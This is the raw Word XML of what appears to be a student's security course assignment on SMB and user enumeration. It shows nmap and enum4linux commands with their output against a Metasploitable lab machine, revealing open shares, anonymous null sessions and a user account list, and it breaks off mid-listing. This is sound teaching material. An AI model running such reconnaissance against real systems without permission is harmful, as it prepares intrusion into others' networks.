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28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alexander Cannell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28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CSIA 2610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Week SMB/User Enumeration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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1) What are three ways to identify information about a SMB share?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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1) NMAP: allows you to see what ports are open to determine if SMB can be used. Also a deep scan can be used to do a SMB OS scan and discovery.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cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># nmap -sS -p 445 10.0.2.0/24</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-20 00:00 MST</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00030s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE  SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp closed microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.2</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00022s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp open  microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.3</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00020s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE    SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp filtered microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 08:00:27:36:C7:29 (Oracle VirtualBox virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00025s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp open  microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 08:00:27:3E:5B:40 (Oracle VirtualBox virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.15</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.000040s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE  SERVICE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp closed microsoft-ds</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap done: 256 IP addresses (5 hosts up) scanned in 2.37 seconds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cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># nmap -A -p 445 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-20 00:02 MST</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap scan report for 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host is up (0.00039s latency).</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PORT    STATE SERVICE     VERSION</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">MAC Address: 08:00:27:3E:5B:40 (Oracle VirtualBox virtual NIC)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Device type: general purpose</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Running: Linux 2.6.X</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">OS CPE: cpe:/o:linux:linux_kernel:2.6</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">OS details: Linux 2.6.9 - 2.6.33</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Network Distance: 1 hop</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Host script results:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">| smb-os-discovery: </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|   OS: Unix (Samba 3.0.20-Debian)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|   NetBIOS computer name: </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|   Workgroup: WORKGROUP</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|_  System time: 2017-02-20T02:02:12-05:00</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">TRACEROUTE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">HOP RTT     ADDRESS</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">1   0.39 ms 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 8.68 seconds</w:t>
        <w:br w:type="textWrapping"/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b w:val="1"/>
          <w:color w:val="2d3b45"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2) ENUM4LINUX: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cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># enum4linux -S 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Feb 20 00:01:46 2017</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Target Information    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Target ........... 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">RID Range ........ 500-550,1000-1050</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Username ......... ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Password ......... ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Enumerating Workgroup/Domain on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Got domain/workgroup name: WORKGROUP</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Session Check on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Server 10.0.2.4 allows sessions using username '', password ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Getting domain SID for 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain Name: WORKGROUP</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain Sid: (NULL SID)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Can't determine if host is part of domain or part of a workgroup</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ===================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Share Enumeration on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ===================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Sharename       Type      Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------       ----      -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">print$          Disk      Printer Drivers</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">tmp             Disk      oh noes!</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">opt             Disk      </w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Server               Comment</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">Workgroup            Master</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">---------            -------</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP            </w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Attempting to map shares on 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/print$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/tmp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: OK, Listing: OK</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/opt</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/IPC$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">[E] Can't understand response:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">WARNING: The "syslog" option is deprecated</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">NT_STATUS_NETWORK_ACCESS_DENIED listing \*</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">//10.0.2.4/ADMIN$</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Mapping: DENIED, Listing: N/A</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">enum4linux complete on Mon Feb 20 00:01:47 2017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﻿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cc0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root@kali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3465a4"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># enum4linux  10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Feb 20 01:07:41 2017</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Target Information    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Target ........... 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">RID Range ........ 500-550,1000-1050</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Username ......... ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Password ......... ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Enumerating Workgroup/Domain on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================================ </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Got domain/workgroup name: WORKGROUP</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Nbtstat Information for 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Looking up status of 10.0.2.4</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE  &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE  &lt;03&gt; -         B &lt;ACTIVE&gt;  Messenger Service</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE  &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Master Browser</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain/Workgroup Name</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP       &lt;1d&gt; -         B &lt;ACTIVE&gt;  Master Browser</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">WORKGROUP       &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Browser Service Elections</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">MAC Address = 00-00-00-00-00-00</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Session Check on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Server 10.0.2.4 allows sessions using username '', password ''</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Getting domain SID for 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ======================================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain Name: WORKGROUP</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Domain Sid: (NULL SID)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Can't determine if host is part of domain or part of a workgroup</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    OS information on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ================================== </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Got OS info for 10.0.2.4 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[+] Got OS info for 10.0.2.4 from srvinfo:</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">platform_id     :</w:t>
        <w:tab/>
        <w:t xml:space="preserve">500</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">os version      :</w:t>
        <w:tab/>
        <w:t xml:space="preserve">4.9</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">server type     :</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x9a03</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">|    Users on 10.0.2.4    |</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> ========================= </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: games</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: nobody</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: proxy</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x6 RID: 0xbba acb: 0x00000010 Account: user</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: just a user,111,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: www-data</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: root</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: news</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: PostgreSQL administrator,,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: bin</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: mail</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: daemon</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: man</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: lp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: MySQL Server,,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: Gnats Bug-Reporting System (admin)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: backup</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: msfadmin,,,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: sys</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Name: (null)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Desc: (null)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix</w:t>
        <w:tab/>
